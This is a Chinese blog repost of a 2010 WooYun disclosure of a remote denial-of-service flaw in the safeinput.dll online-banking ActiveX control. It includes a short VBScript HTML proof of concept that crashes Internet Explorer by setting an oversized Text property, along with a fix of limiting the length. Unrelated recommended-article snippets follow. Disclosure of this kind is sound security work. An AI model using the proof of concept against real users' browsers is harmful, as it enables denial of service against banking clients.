宇信易诚网银客户端安全控件存在远程拒绝服务漏洞

最新推荐文章于 2025-12-03 22:07:00 发布
原创 最新推荐文章于 2025-12-03 22:07:00 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #hack #网络安全 #wooyun

国内网银解决方案提供商北京宇信易诚的safeinput.dll存在远程拒绝服务漏洞,参数长度未控制可能导致IE崩溃;厂商最初未回应,后公开漏洞细节。建议限制Text长度以修复。

漏洞详情

披露状态:

2010-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北京宇信易诚是国内领先的网银解决方案提供商,在国内拥有大量的银行客户(客户列表http://www.yuchengtech.com/success.php),但是其网银客户端安全控件safeinput.dll存在远程拒绝服务漏洞可导致ie崩溃

详细说明:

Text变量长度未做控制,如果提交的过长的参数,之后的操作会导致内存异常,使IE崩溃出错
经过分析,该漏洞不能用来执行代码.

漏洞证明:

<html>
eChannels Century safeinput.dll test page
<object classid='clsid:ECCBA953-80E5-11D3-9285-0080ADB811C5' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\safeinput.dll"
prototype  = "Property Let Text As String"
memberName = "Text"
progid     = "safeSetInputLib.safeInput"
argCount   = 1
arg1=String(45530, "A")
target.Text = arg1
</script>

修复方案:

限制Text长度

版权声明:转载请注明来源 路人甲@乌云

Sword-heart
关注
[java面试]易诚 广州分公司 java笔试题目回忆录
苏生-苏米沿的专栏
06-04 4621
记录一下最近面试的时候遇见的几个问题,反思总结,方便下次面试:先看下北京易诚网络技术经常考的几个问题吧:一.面试试题背景内容报文格式定义如下:20字符长的姓名+1字符长的性别+3字符长的龄姓名长度不足20的右边补空格 性别中0表示男,1表示女龄不足3字符的左边补0如:denny     0026这一段报文解析后表示姓名为denny性别为男,龄为26数据库表结构如下:create tabl
易诚EMP入门开发指南.rar
09-12
易诚EMP(Enterprise Mobile Platform)是一款专为企业级移动应用开发设计的平台,它提供了丰富的功能和组件,便于开发者快速构建稳定、安全的移动应用。EMP主要关注于银行和其他金融机构的业务流程,旨在提高...
EPoD: 以太坊Geth客户端拒绝服务漏洞 (CVE-2018-12018)
Fly_鹏程万里
07-15 1061
迄今为止,PeckShield发现了很多严重的智能合约漏洞。除了智能合同外,以太坊生态系统还包括其他各种可能受到攻击的组件。显然,一个这样的组件是以太坊的核心,也就是每个以太坊节点上运行的底层客户端软件。如果攻击者使某个以太坊客户端/节点崩溃,那么此客户端/节点提供的计算能力也随之消失。如果大量以太坊的客户/节点突然间断线,他们相应的计算能力可能会立即失效,从而严重干扰以太坊的整个运营。在撰写本文...
android 拒绝服务漏洞,Android APP通用型拒绝服务漏洞分析报告
weixin_26834281的博客
05-25 157
点评:记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞,移动安全团队爱内测(ineice.com)发现了一个安卓客户端的通用型拒绝服务漏洞,来看看他们的详细分析吧。0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。针对序列化对象而出现的拒绝服务主要是由于应用中使用了getSeri...
Web下的拒绝服务漏洞(DoS)
yggcwhat
09-29 2845
Web下的拒绝服务漏洞(DoS)
易诚java面试_易诚笔试题
weixin_39726697的博客
03-02 217
我知道笔试B是英文水平测试,包括三部分,单词、英译汉、作文,难度都不大但是他们的要求非常之高,总共6个题,共11个空,我们必须对9个才算及格,也就是说最多错一道题吧,因为有些题是3个空,有些是2个空,1个空的就那么1、2道吧。题型大概是这样的:题目大概都是在10多个框中放10多个数字,然后根据框中的数字来完成图表中(流程控制图)的逻辑判断和逻辑走向以此来给出它所要求的空的答案。选择题1:鉴于Jav...
易诚 两季度亏损与高管出走的背后
cyl937的专栏
02-12 5808
上市之初的易诚(NASDAQ:YTEC),曾经连续两业绩增长速度超过40%。那个一度产品线最全、品牌影响力最大、资金最雄厚的金融行业方案商——易诚,近两个季度却出现了业绩的连续亏损。这在易诚、乃至其前身鸿泰的发展史上前所未有。而上市数间,多位高管离职,带走了业务团队,带走了客户,这一切的背后到底发生了什么?又是什么成为矛盾激化的导火索?   两季度亏损359万美元
易诚Liana银行系统软件界面设计
Chris Ning'Blog
04-23 438
易诚Liana银行系统软件界面设计
易诚 为何成长如此之快
hualusiyu的专栏
04-08 3021
易诚:服务中国金融 在洪卫东的眼睛里,我们几乎无法发现自得和欣喜,虽然他领导的北京易诚科技有限公司刚刚在今三月成为国内第一家在纳斯达克上市的金融行业应用软件服务公司,并且洪卫东本人作为易诚的CEO,被评为2006度IT渠道十大度人物。   北京雨后的下午,把自己塞在办公室宽大沙发上的洪卫东,和笔者聊得最多的,是他对于公司核心竞争力的分析,以及对于金融IT
易诚“高级系统架构师”内训圆满结束
中科院计算所培训中心
12-04 1517
易诚“高级系统架构师”课程于2013.11.30-12.1成功举办。在这两天的时间里,易诚的几十位技术负责人及骨干同谢老师和袁老师一起畅游在思考的海洋,充分吸取并享受着知识的养分…… 课前有个小细节值得一说,课前的课桌是讨论岛屿式摆放,谢老师倒现场后,要求改成课桌式,门道在于技术是严肃的课程,是思考的课程,是需要大脑高度集中高度转动的课程,要给大家一个思考的氛围!课上大家非常认真
北京易诚科技有限公司招聘JAVA笔试真题及答案(1).doc
07-06
知识点: 1. Java适合的计算环境:Java...在上述方法中,变量a和b都指向了字符串对象,即使a被重新指向b所引用的对象,原来的a所引用的字符串对象仍然存在,它将在未来的某个时刻成为垃圾回收的目标。 用的描述内容:
易诚世纪 Liana 网上银行解决方案
07-09
易诚世纪的Liana网上银行解决方案是针对国内金融机构在金融创新和服务方式方面日益增长的复杂需求而设计的。随着电子商务的崛起和WTO的影响,银行需要建立特色化的网上银行系统,优化IT架构以降低成本,同时确保系统...
北京易诚科技JAVA笔试真题解析
同时,由于易诚科技长期服务于银行、证券等金融机构,其系统对稳定性、安全性和高并发处理能力有极高要求,因此笔试题中也可能出现分布式系统相关的问题,比如缓存穿透与雪崩的应对策略、消息队列的使用场景(如...
网络安全防护指南:筑牢网络安全防线(510)
2509_94105975的博客
12-01 763
网络是指由计算机或者其他息终端及相关设备组成的按照一定的规则和程序对息收集、存储、传输、交换、处理的系统。在当今数字化时代,网络已经成为人们生活和工作中不可或缺的一部分。它连接了世界各地的人们,使得息的传递和交流变得更加便捷高效。
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1671
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
中科大计算机网络——网络安全
Tandy12356_的博客
12-01 366
使用checksum作为H不合适,因为很容易反向计算出m'与m有同样的报文摘要。为何不能让你逆向推导出报文m?防止你用不合法的协议m'在法庭上要挟签名人。使用公开密钥加密体系作认证的缺陷:中间人攻击。本质原因:Bob没有拿到真正Alice的公钥。解决方案:让Bob可靠地拿到Alice的公钥。只要根是可靠的,后面大概率也是可靠的。求幂次方和求模运算代价非常大。
网络安全系列:系统后门与持久化技术深度解析
PyHaVolask的博客
12-03 1320
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
网络安全中级阶段学习笔记(二):网络安全暴力破解学习重点笔记
最新发布
2501_91976946的博客
12-03 1008
本文系统梳理了网络安全中暴力破解攻击的学习要点,主要内容包括:1)暴力破解的基础概念、产生原因及工作原理;2)攻击分类与准备工作,重点介绍常用字典类型;3)BurpSuite工具详解,涵盖Intruder模块的4种攻击模式及关键配置;4)Pikachu靶场实战案例,演示前端/后端验证码绕过及Token防护;5)防御措施和BurpSuite其他功能模块。笔记采用流程图、表格等形式归纳核心知识点,强调"知攻知防"的学习理念,为暴力破解技术的学习与应用提供系统指导。
AI驱动的网联自动驾驶汽车网络安全测试方法
NewCarRen的博客
12-03 1018
本文综述了网联自动驾驶汽车(CAV)网络安全测试面临的挑战与解决方案。随着CAV普及,网络攻击风险加剧,现有渗透测试方法面临测试环境成本高、专业人才匮乏等挑战。研究表明,人工智能(AI)在传统行业渗透测试中展现出缩短时间、提高效率的优势,但在CAV领域应用仍存在明显缺口。文章重点分析了强化学习等AI算法在渗透测试中的应用潜力,指出创建仿真环境是测试AI模型有效性的可行方案。开源工具VEINS被推荐为合适的仿真平台,其Python/C++接口便于AI模型集成。研究认为,若证实AI方法有效,可扩展应用于完整CA
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值